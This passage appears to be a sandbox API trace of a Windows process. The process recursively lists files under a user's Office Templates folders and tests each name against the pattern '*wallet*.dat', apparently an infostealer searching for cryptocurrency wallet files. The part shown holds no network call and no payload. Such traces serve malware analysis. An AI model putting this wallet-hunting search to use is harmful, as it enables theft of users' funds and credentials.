[0234.821] PathMatchSpecA (pszFile="TM02851218[[fn=gb]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.821] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851218[[fn=gb]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x97625f0b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97625f0b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9762869a, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4181d, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.821] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978514f8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978514f8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97853bdd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e7cc, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851219[[fn=gostname]].xsl", cAlternateFileName="TM003E~1.XSL")) returned 1 [0234.821] PathMatchSpecA (pszFile="TM02851219[[fn=gostname]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.821] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851219[[fn=gostname]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x978514f8, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x978514f8, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97853bdd, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e7cc, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.821] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976cbe5d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x976cbe5d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x976d0c4a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d498, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851220[[fn=gosttitle]].xsl", cAlternateFileName="TM0285~3.XSL")) returned 1 [0234.822] PathMatchSpecA (pszFile="TM02851220[[fn=gosttitle]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.822] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851220[[fn=gosttitle]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x976cbe5d, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x976cbe5d, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x976d0c4a, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d498, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.822] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983d213f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d213f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d4a29, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x456ff, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851221[[fn=harvardanglia2008officeonline]].xsl", cAlternateFileName="TM8026~1.XSL")) returned 1 [0234.822] PathMatchSpecA (pszFile="TM02851221[[fn=harvardanglia2008officeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.822] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851221[[fn=harvardanglia2008officeonline]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x983d213f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x983d213f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x983d4a29, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x456ff, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.822] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982fc8d7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982fc8d7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x982fc8d7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x47d22, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851222[[fn=ieee2006officeonline]].xsl", cAlternateFileName="TMA855~1.XSL")) returned 1 [0234.822] PathMatchSpecA (pszFile="TM02851222[[fn=ieee2006officeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.822] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851222[[fn=ieee2006officeonline]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x982fc8d7, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x982fc8d7, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x982fc8d7, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x47d22, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.822] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98050de7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98050de7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98055ce4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41f76, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851223[[fn=iso690]].xsl", cAlternateFileName="TM536F~1.XSL")) returned 1 [0234.823] PathMatchSpecA (pszFile="TM02851223[[fn=iso690]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.823] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851223[[fn=iso690]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x98050de7, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98050de7, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98055ce4, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x41f76, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.823] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977efc44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977efc44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977f0f37, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x35031, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851224[[fn=iso690nmerical]].xsl", cAlternateFileName="TM9858~1.XSL")) returned 1 [0234.823] PathMatchSpecA (pszFile="TM02851224[[fn=iso690nmerical]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.823] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851224[[fn=iso690nmerical]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x977efc44, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x977efc44, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x977f0f37, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x35031, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.823] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9786c3ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9786c3ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9786d825, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e39b, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", cAlternateFileName="TM49BE~1.XSL")) returned 1 [0234.823] PathMatchSpecA (pszFile="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.823] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851225[[fn=mlaseventheditionofficeonline]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x9786c3ef, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9786c3ef, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9786d825, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e39b, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.824] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977a2c28, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977a2c28, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977a3fe6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x540ef, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851226[[fn=turabian]].xsl", cAlternateFileName="TME914~1.XSL")) returned 1 [0234.824] PathMatchSpecA (pszFile="TM02851226[[fn=turabian]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.824] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851226[[fn=turabian]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x977a2c28, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x977a2c28, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x977a3fe6, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x540ef, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.824] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 1 [0234.824] PathMatchSpecA (pszFile="TM02851227[[fn=sist02]].xsl", pszSpec="*wallet*.dat") returned 0 [0234.824] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851227[[fn=sist02]].xsl\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x9830edbc, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9830edbc, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98311346, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d467, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0234.824] FindNextFileA (in: hFindFile=0x6e1b20, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 0 [0234.824] FindClose (in: hFindFile=0x6e1b20 | out: hFindFile=0x6e1b20) returned 1 [0234.825] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d467, dwReserved1=0x141f, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~1")) returned 1 [0234.826] PathMatchSpecA (pszFile="Word Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0234.826] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\*", lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1ba0 [0234.826] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.826] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 1 [0234.826] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0234.826] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1760 [0234.836] FindNextFileA (in: hFindFile=0x6e1760, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.836] FindNextFileA (in: hFindFile=0x6e1760, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980dfb29, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980dfb29, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980e0ec2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xca72, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM01840907[[fn=Equations]].dotx", cAlternateFileName="TM0184~1.DOT")) returned 1 [0234.837] PathMatchSpecA (pszFile="TM01840907[[fn=Equations]].dotx", pszSpec="*wallet*.dat") returned 0 [0234.837] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x980dfb29, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980dfb29, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x980e0ec2, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xca72, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.837] FindNextFileA (in: hFindFile=0x6e1760, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980cc2bb, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980cc2bb, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980cc2bb, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xb8c0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", cAlternateFileName="TM0283~1.DOC")) returned 1 [0234.837] PathMatchSpecA (pszFile="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", pszSpec="*wallet*.dat") returned 0 [0234.837] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x980cc2bb, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980cc2bb, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x980cc2bb, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xb8c0, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.837] FindNextFileA (in: hFindFile=0x6e1760, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98167377, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98167377, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98167377, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x866f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03998158[[fn=Element]].dotx", cAlternateFileName="TM0399~1.DOT")) returned 1 [0234.837] PathMatchSpecA (pszFile="TM03998158[[fn=Element]].dotx", pszSpec="*wallet*.dat") returned 0 [0234.837] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98167377, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98167377, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98167377, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x866f, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.838] FindNextFileA (in: hFindFile=0x6e1760, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03998159[[fn=Insight]].dotx", cAlternateFileName="TM0399~2.DOT")) returned 1 [0234.838] PathMatchSpecA (pszFile="TM03998159[[fn=Insight]].dotx", pszSpec="*wallet*.dat") returned 0 [0234.838] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9846e6c1, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9846e6c1, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x985f3b86, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x34df74, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.838] FindNextFileA (in: hFindFile=0x6e1760, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03998159[[fn=Insight]].dotx", cAlternateFileName="TM0399~2.DOT")) returned 0 [0234.838] FindClose (in: hFindFile=0x6e1760 | out: hFindFile=0x6e1760) returned 1 [0234.839] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 0 [0234.839] FindClose (in: hFindFile=0x6e1ba0 | out: hFindFile=0x6e1ba0) returned 1 [0234.840] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d467, dwReserved1=0x141f, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~1")) returned 0 [0234.840] FindClose (in: hFindFile=0x6e1b60 | out: hFindFile=0x6e1b60) returned 1 [0234.840] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, 